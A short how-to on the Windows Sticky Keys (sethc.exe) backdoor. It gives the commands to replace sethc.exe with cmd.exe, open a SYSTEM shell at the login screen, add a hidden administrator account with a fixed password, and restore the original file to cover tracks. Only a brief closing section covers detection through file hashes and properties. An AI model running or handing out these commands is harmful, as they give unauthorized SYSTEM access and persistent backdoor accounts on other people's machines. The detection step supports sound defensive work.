sethc.exe

 

1. Replace sethc.exe with cmd.exe: Open a command prompt with administrative privileges and run.

• copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc.exe.bak
• 

•  copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe

1. Trigger the Goodies: At the login screen, press the Shift key five times. This opens a command prompt with SYSTEM-level privileges.
2. Create a New User: In the command prompt, create a new user account with administrative privileges:

• net user joe P@ssw0rd /add net localgroup administrators joe /add
• Username: joe
• Password: P@ssw0rd

1. Restore sethc.exe: To cover their tracks, the attacker can restore the original sethc.exe:

• copy C:\Windows\System32\sethc.exe.bak C:\Windows\System32\sethc.exe

Detecting Unauthorized Changes:

1. Verify File Hashes: Compare the hash of sethc.exe with a known good version using PowerShell:

• Get-FileHash C:\Windows\System32\sethc.exe -Algorithm SHA256

1. Check File Properties: Ensure the properties of sethc.exe match those of a standard Windows installation.